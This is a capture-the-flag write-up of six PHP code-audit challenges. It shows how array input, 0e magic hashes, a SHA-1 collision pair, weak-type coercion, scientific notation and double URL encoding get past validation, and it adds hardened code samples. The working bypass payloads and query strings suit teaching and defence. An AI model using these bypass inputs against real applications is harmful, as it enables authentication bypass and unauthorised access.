Code audit
Question 1 (String Bypass)
Analysis: the script first checks whether the parameter is a string and dies if it is; then it checks with strpos() whether it contains hehehehehahaha and dies if it does.
Solution:
How do we bypass strpos()?
Array bypass: we request
http://10.81.8.126/code/1.php?s[]=hehehehehahaha
flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
Question 2 (MD5 bypass)
The sha1() function hashes the input.
Method 1
It should work like the md5() bypass: since a string is passed in, we look for inputs whose hash starts with 0e.
Principle: PHP is weakly typed. Even though the hash is a string, a value beginning with 0e7889 is read as scientific notation (a 0 followed by an exponent of 7889) when it is loosely compared, so every such hash evaluates to the number 0 and they all compare equal under ==.
md5:
240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
sha1:
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799
Doesn't work:
?username=aaroZmOk&password=aaK1STfY
Why not?
Because the comparison here is strict (===): after hashing, the two values are no longer loosely compared with the number 0; a string comparison is performed instead.
I searched online and found two values that collide to the same sha1 but have different source bytes.
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
Method 2
Array bypass
Like md5(), sha1() does not accept an array: in PHP 7 it emits a warning and returns NULL, so two array inputs both hash to NULL and compare equal (PHP 8 throws a TypeError instead).
Test:
As for why password[1] rather than password[]: there is a condition requiring username != password, so the two arrays have to differ.
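The two bypasses from Questions 1 and 2 (0e magic hashes under ==, and array input to md5()/sha1()) next to a hardened check, as an added example that is not the challenge's own code; the function names and the login shape are my assumptions:

```php
<?php
// Added example, not the challenge's own code. It reproduces the two bypasses
// discussed in Questions 1 and 2 (0e "magic hashes" under ==, and array input
// to md5()/sha1()) and puts a hardened check next to the loose one.

// Loose check in the style of the challenge: == on hashes, no type check.
function vulnerable_check($username, $password): bool
{
    if ($username == $password) {       // the "username != password" condition
        return false;
    }
    // PHP 7: md5(array) warns and returns NULL, so NULL == NULL is true.
    // PHP 8: md5(array) throws TypeError instead, which @ does not suppress.
    return @md5($username) == @md5($password);
}

// Hardened: only strings, and hashes compared strictly with hash_equals().
function hardened_check($username, $password): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    if ($username === $password) {
        return false;
    }
    return hash_equals(md5($username), md5($password));
}

// Magic hashes from the md5 list above: both digests look like "0e" followed by
// digits, so == reads them as the float 0.0 and reports them equal.
var_dump(vulnerable_check('QNKCDZO', '240610708')); // bool(true)  bypassed
var_dump(hardened_check('QNKCDZO', '240610708'));   // bool(false) different strings

// Array bypass, as in ?username[]=a&password[1]=b.
try {
    var_dump(vulnerable_check(['a'], [1 => 'b']));  // PHP 7: bool(true)  bypassed
} catch (TypeError $e) {
    echo "PHP 8: md5() rejects arrays with a TypeError\n";
}
var_dump(hardened_check(['a'], [1 => 'b']));        // bool(false) not strings
```

The same reasoning applies to sha1(): both functions return NULL for an array on PHP 7, and hash_equals() with an is_string() guard closes both holes.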
Question 3
Testing the code.
Let's take a closer look at our parameters.
If we write it like this:
Why do we need to write 11 parameters? Besides the index issue, the assignment inside the loop has no explicit index (it appends), so the loop has to run 11 times; the 11th element then has index 10, and its value must be hacker!
But why does ?0&1&2&3&4&5&6&7&8&9&10=hacker! work?
In fact you can enter anything, as long as there are 11 parameters, because the index starts at 0.
In other words, you could also enter ?1&1&1&1&1&1&1&1&1&1&10=hacker!
or even ?A&B&C&D&E&F&G&H&I&J&Q=hacker!
The teacher said that as long as the loop runs 11 times, its 11th index will be 10.
Answer: flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
Question 4
Analysis: the script checks whether the input is a number and dies if it is; then it checks whether the input is greater than 996, and if it is, it prints the flag.
Method 1
Try the array bypass? Success.
From the analysis, an array skips the first check. Now let's try the second check on our own.
An empty value works too. Feasible.
Method 2
Weak-type coercion bypass
Principle: the string '997a' is coerced to the number 997 in a loose numeric comparison.
Question 5 (scientific notation)
Analysis:
The input must match one or more [A-Za-z0-9] characters, its length must be less than 8, and its value must be greater than eight 9s (99999999).
Solution:
Try an array, but it doesn't work: the regex can't match an array directly. Another idea is hexadecimal by adding a 0x prefix: 100 million is 0x575360400, but that doesn't work either. Try again with weak type conversion, eh~ that won't work either.
Scientific notation 1e8 gets through. Note that it is 1, e, 8: the digit 1 as in 123, not a lowercase l or a capital I.
?check=1e8
1e8 = 1 × 10^8 = 100 million
flag{c2735cdb-67f3-479d-bf0f-b5a31b2c1a0a}
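How PHP's loose comparison treats the inputs from Questions 4 and 5, beside a check that rejects them, as an added example that is not the challenge source; loose_check() is my reading of the Question 5 conditions, and the function names and the 0x5F5E100 value are my own:

```php
<?php
// Added example, not the challenge source. It shows how PHP's loose comparison
// handles the inputs from Questions 4 and 5, and a check that rejects them.
// loose_check() is my reading of the Question 5 conditions, not the real code.

function loose_check(string $check): bool
{
    return preg_match('/^[A-Za-z0-9]+$/', $check) === 1
        && strlen($check) < 8
        && $check > 99999999;   // string vs int: "1e8" is numeric, compared as 100000000
}

// Strict version: only a plain decimal integer may be compared as a number.
// With a real integer, "fewer than 8 characters" and "> 99999999" can never both
// hold; that is exactly the contradiction the loose comparison let "1e8" sidestep.
function strict_check(string $check): bool
{
    $n = filter_var($check, FILTER_VALIDATE_INT);   // false for "1e8", "0x...", "997a"
    return $n !== false && strlen($check) < 8 && $n > 99999999;
}

// Question 4: not a number, yet greater than 996.
var_dump(is_numeric('997a'));   // bool(false) -> passes the "is it a number" check
var_dump('997a' > 996);         // bool(true)  PHP 7: leading digits -> 997 > 996
                                //             PHP 8: "997a" vs "996" compared as strings
var_dump('997a' == 997);        // PHP 7: bool(true); PHP 8: bool(false)
var_dump('1000a' > 996);        // PHP 7: bool(true); PHP 8: bool(false) ("1" < "9")

// Question 5: scientific notation passes the regex and length but exceeds 99999999.
var_dump(loose_check('1e8'));        // bool(true)  3 chars, alphanumeric, 1e8 > 99999999
var_dump(loose_check('0x5F5E100'));  // bool(false) 9 chars (0x5F5E100 is hex for 100000000)
var_dump(loose_check('99999999'));   // bool(false) 8 chars, and not greater than itself
var_dump(strict_check('1e8'));       // bool(false) rejected before any comparison
```

The PHP 8 lines show that the '997a' trick survives the saner string-to-number comparison only by accident of string ordering, which is why a type check before the comparison, not a newer PHP version, is the real fix.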
Question 6 (encoding bypass)
Analysis:
The password is checked with strpos(); the bypass is to encode it.
URL-encode the value an extra time, because the script decodes it again later.
Try it:
First convert each character to hexadecimal and prefix each byte with %:
61 64 6d 69 6e 31 32 33 31 32 33 31 32 33
%61%64%6d%69%6e%31%32%33%31%32%33%31%32%33
But why does it work when encoded twice, yet not when encoded once?
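The double-decoding path behind that question, simulated in an added example that is not the challenge source: the web server decodes percent-encoding once while building $_GET, and a script that calls urldecode() again strips a second layer. The once-encoded string is the one from above; the function names, the %25 second layer and the blacklist word admin are my assumptions.

```php
<?php
// Added example, not the challenge source. It simulates the double-decoding path
// behind Question 6: the web server decodes percent-encoding once when it builds
// $_GET, and a script that calls urldecode() again decodes a second layer. The
// blacklist word "admin" and the once-encoded string are taken from the post.

function server_receives(string $raw_query_value): string
{
    return urldecode($raw_query_value);   // stands in for PHP's automatic $_GET decoding
}

// Vulnerable shape: strpos() runs on the value as received, then it is decoded again.
function vulnerable_filter(string $value): string
{
    if (strpos($value, 'admin') !== false) {
        return 'blocked';
    }
    return urldecode($value);             // the extra decode that makes double encoding work
}

// Fixed shape: canonicalise first, then run the check on the decoded form.
function fixed_filter(string $value): string
{
    $decoded = urldecode($value);
    if (strpos($decoded, 'admin') !== false) {
        return 'blocked';
    }
    return $decoded;
}

$once  = '%61%64%6d%69%6e%31%32%33%31%32%33%31%32%33';  // "admin123123123" encoded once
$twice = str_replace('%', '%25', $once);                 // second layer: "%" -> "%25"

echo vulnerable_filter(server_receives($once)),  "\n";  // blocked: server decode already yields "admin..."
echo vulnerable_filter(server_receives($twice)), "\n";  // admin123123123: strpos saw "%61%64...", then decoded
echo fixed_filter(server_receives($twice)),      "\n";  // blocked
```

Encoding once never helps because the server's own decode has already produced the plaintext before strpos() runs; encoding twice leaves one layer for the script's urldecode() to remove after the check has passed.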